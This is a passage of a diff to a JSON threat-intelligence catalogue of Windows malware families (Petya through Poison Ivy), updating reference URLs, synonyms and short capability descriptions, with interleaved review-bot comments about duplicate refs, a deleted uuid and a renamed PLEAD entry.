[], + "type": [] + }, + "uuid": "88f636b9-9c2e-4faf-ab83-b91009bf47fc", + "value": "Pekraut" + }, { "description": "", "meta": { 
@@ -12992,9 +23807,11 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/", - "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/" + "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", + "https://www.microsoft.com/security/blog/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", + "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" ], "synonyms": [], "type": [] @@ -13006,8 +23823,7 @@ "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", - "https://community.fireeye.com/external/1093" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift" ], "synonyms": [ "ReRol" 
@@ -13036,9 +23852,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", - "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/" ], "synonyms": [], 
@@ -13047,12 +23864,48 @@ "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", "value": "Philadephia Ransom" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.coveware.com/blog/phobos-ransomware-distributed-dharma-crew", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://blog.malwarebytes.com/threat-spotlight/2020/01/threat-spotlight-phobos-ransomware-lives-up-to-its-name/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://blog.malwarebytes.com/threat-analysis/2019/07/a-deep-dive-into-phobos-ransomware/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-the-eking-variant-of-phobos-ransomware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d061daca-4415-4b3e-9034-231e37857eed", + "value": "Phobos Ransomware" + }, + { + "description": "Keylogger, information stealer.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoenix_keylogger", + "https://www.cybereason.com/blog/phoenix-the-tale-of-the-resurrected-alpha-keylogger" + ], + "synonyms": [], + "type": [] + }, + "uuid": "601ea680-68ec-43c9-ba20-88eaaefe8818", + "value": "Phoenix Keylogger" + }, { "description": " Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. 
It communicates to a list of four preconfigured C2 servers via ICMP on port 53", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal", - "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf" + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn" ], "synonyms": [ "Rizzo" 
@@ -13067,11 +23920,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", - "https://www.johannesbader.ch/2016/02/phorpiex/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", + "https://research.checkpoint.com/2019/phorpiex-breakdown/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", - "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", - "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" + "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.johannesbader.ch/2016/02/phorpiex/", + "https://www.zdnet.com/article/someone-is-uninstalling-the-phorpiex-malware-from-infected-pcs-and-telling-users-to-install-an-antivirus/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", + "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" ], "synonyms": [ "Trik" 
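Review bot: The Phorpiex refs now carry the same article twice under two hosts, `https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/` and `https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/`. The same pattern recurs in the Pony hunk, where `http://www.secureworks.com/research/threat-profiles/gold-essex` and its https twin are both added, and in the PLEAD hunk, where the SANS summit PDF appears as both a live URL and a web.archive.org snapshot. Since this file is regenerated from the Malpedia API, these are presumably upstream data rather than hand edits, so the fix belongs in the generator (normalise scheme and host aliases before de-duplicating refs) or in an upstream report; duplicate refs inflate the cluster without adding provenance.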
@@ -13081,6 +23942,47 @@ "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", "value": "Phorpiex" }, + { + "description": "PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed solely utilized by APT34.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pickpocket", + "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2eb298de-e14b-46c1-a45f-26ae0d2c4003", + "value": "PICKPOCKET" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pierogi", + "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-2-the-discovery-of-the-new-mysterious-pierogi-backdoor", + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2bda00e8-e6a7-448d-8dfa-4f2276230e8b", + "value": "Pierogi" + }, + { + "description": "According to FireEye, PILLOWMINT is a Point-of-Sale malware tool used to scrape track 1 and track 2 payment card data from memory.\r\n Scraped payment card data is encrypted and stored in the registry and as plaintext in a file (T1074: Data Staged)\r\n Contains additional backdoor capabilities including:\r\n Running processes\r\n Downloading and executing files (T1105: Remote File Copy)\r\n Downloading and injecting DLLs (T1055: Process Injection)\r\n Communicates with a command and control (C2) server over HTTP using AES encrypted messages\r\n (T1071: Standard Application Layer Protocol)\r\n (T1032: Standard Cryptographic Protocol)\r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint", + 
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dec78ec5-f02d-461f-a8cc-cd4e80099e38", + "value": "PILLOWMINT" + }, { "description": "", "meta": { @@ -13099,9 +24001,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", - "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/", + "https://www.secureworks.com/research/threat-profiles/bronze-mayfair", + "https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + ], + "synonyms": [ + "CookieCutter", + "SHOTPUT" ], - "synonyms": [], "type": [] }, "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", @@ -13112,8 +24021,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", + "https://isc.sans.edu/diary/rss/25068", + "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", - "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" + "https://johannesbader.ch/2019/07/the-dga-of-pitou/" ], "synonyms": [], "type": [] 
@@ -13141,7 +24052,6 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", "http://blog.kleissner.org/?p=788", - "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" ], "synonyms": [ @@ -13159,6 +24069,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" ], "synonyms": [], 
@@ -13181,39 +24093,43 @@ "value": "playwork" }, { - "description": "", + "description": "PLEAD is a RAT used by the actor BlackTech. FireEye uses the synonyms GOODTIMES for the RAT module and DRAWDOWN for the respective downloader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", + "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html", + "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html", + "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html", + "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", + "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt", + "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/", + "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020", + "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html", "http://www.freebuf.com/column/159865.html", - "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", 
"http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", - "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/", - "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf" + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", + "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf", + "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html", + "https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/" ], "synonyms": [ - "TSCookie" + "DRAWDOWN", + "GOODTIMES", + "Linopid" ], "type": [] }, "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", - "value": "PLEAD" - }, - { - "description": "", - "meta": { - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" - ], - "synonyms": [], - "type": [] - }, - "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", - "value": "Plexor" + "value": "PLEAD (Windows)" }, { "description": "", @@ -13221,7 +24137,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", - "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" + "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", + "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html", + "https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [], "type": [] 
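Review bot: The Plexor element with uuid `5c860744-bb12-4587-a852-ee060fd4dd64` is deleted outright in this hunk, which silently breaks any MISP event or galaxy relation that references that uuid; galaxy cluster uuids are meant to be stable, so the element should stay in the file and be marked as superseded or revoked rather than removed. In the same hunk the PLEAD element keeps its uuid but its `value` changes from `"PLEAD"` to `"PLEAD (Windows)"` and the `"TSCookie"` synonym is dropped, so consumers that match on the display name or on that synonym no longer find it. If the rename is intended to mirror Malpedia's split, keeping `"PLEAD"` in `synonyms` would preserve name-based matching; uuid-based references are unaffected.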
@@ -13248,32 +24167,114 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", - "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", - "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", - "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", - "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://community.rsa.com/thread/185439", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", - "https://securelist.com/time-of-death-connected-medicine/84315/", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", + "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", + "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/", + 
"https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", + "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", + "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", + "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", + "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", + "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", + "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html", "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-olive", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", + "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/", + "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", + 
"https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", + "https://www.secureworks.com/research/bronze-president-targets-ngos", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html", + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", + "https://blog.ensilo.com/uncovering-new-activity-by-apt10", + "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", + "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html", + "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", 
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.macnica.net/file/security_report_20160613.pdf", + "https://securelist.com/time-of-death-connected-medicine/84315/", + "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/", + "https://www.secureworks.com/research/threat-profiles/bronze-express", + "https://www.secureworks.com/research/threat-profiles/bronze-woodland", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", + "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.contextis.com/de/blog/avivore", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://www.secureworks.com/research/threat-profiles/bronze-union", + "https://twitter.com/stvemillertime/status/1261263000960450562", + "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", + "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf", + "https://risky.biz/whatiswinnti/", + "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", + "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", + 
"https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", + "https://securelist.com/cycldek-bridging-the-air-gap/97157/", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", + "https://www.secureworks.com/research/threat-profiles/bronze-president" ], "synonyms": [ - "Korplug" + "Destroy RAT", + "Kaba", + "Korplug", + "Sogu", + "TIGERPLUG" ], "type": [] }, "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", "value": "PlugX" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox", + "https://securelist.com/plurox-modular-backdoor/91213/", + "https://sysopfb.github.io/malware,/crypters/2019/09/23/Plurox-packer-layer-unpacked.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6c8b94fc-f2d4-4347-aa49-4e6daac74314", + "value": "Plurox" + }, { "description": "", "meta": { 
@@ -13287,23 +24288,85 @@ "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", "value": "pngdowner" }, + { + "description": "uses POCO C++ cross-platform library, Xor-based string obfuscation, SSL library code and string overlap with Xtunnel, infrastructure overlap with X-Agent, probably in use since mid-2018", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pocodown", + "https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html", + "https://twitter.com/cyb3rops/status/1129653190444703744", + "https://threatvector.cylance.com/en_us/home/flirting-with-ida-and-apt28.html" + ], + "synonyms": [ + "Blitz", + "PocoDownloader" + ], + "type": [] + }, + "uuid": "25804d6d-447f-4933-9ba0-876f9d054b68", + "value": "PocoDown" + }, + { + "description": "According to FireEye, POISONPLUG is a highly obfuscated modular backdoor with plug-in capabilities. The malware is capable of registry or service persistence, self-removal, plug-in execution, and network connection forwarding. 
POISONPLUG has been observed using social platforms to host encoded C&C commands.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poisonplug", + "https://content.fireeye.com/apt-41/rpt-apt41/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://www.fireeye.com/blog/threat-research/2019/10/lowkey-hunting-for-the-missing-volume-serial-id.html", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage" + ], + "synonyms": [ + "Barlaiy" + ], + "type": [] + }, + "uuid": "3b1c7856-5158-418c-90ad-afda67a66963", + "value": "poisonplug" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", + "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", - "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", + 
"https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", + "https://lab52.io/blog/icefog-apt-group-abusing-recent-conflict-between-iran-and-eeuu/", "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", + "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://www.youtube.com/watch?v=1WfPlgtfWnQ", + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment", + "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "https://vblocalhost.com/uploads/VB2020-20.pdf", + "https://community.riskiq.com/article/56fa1b2f", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", - "http://blogs.360.cn/post/APT_C_01_en.html", - 
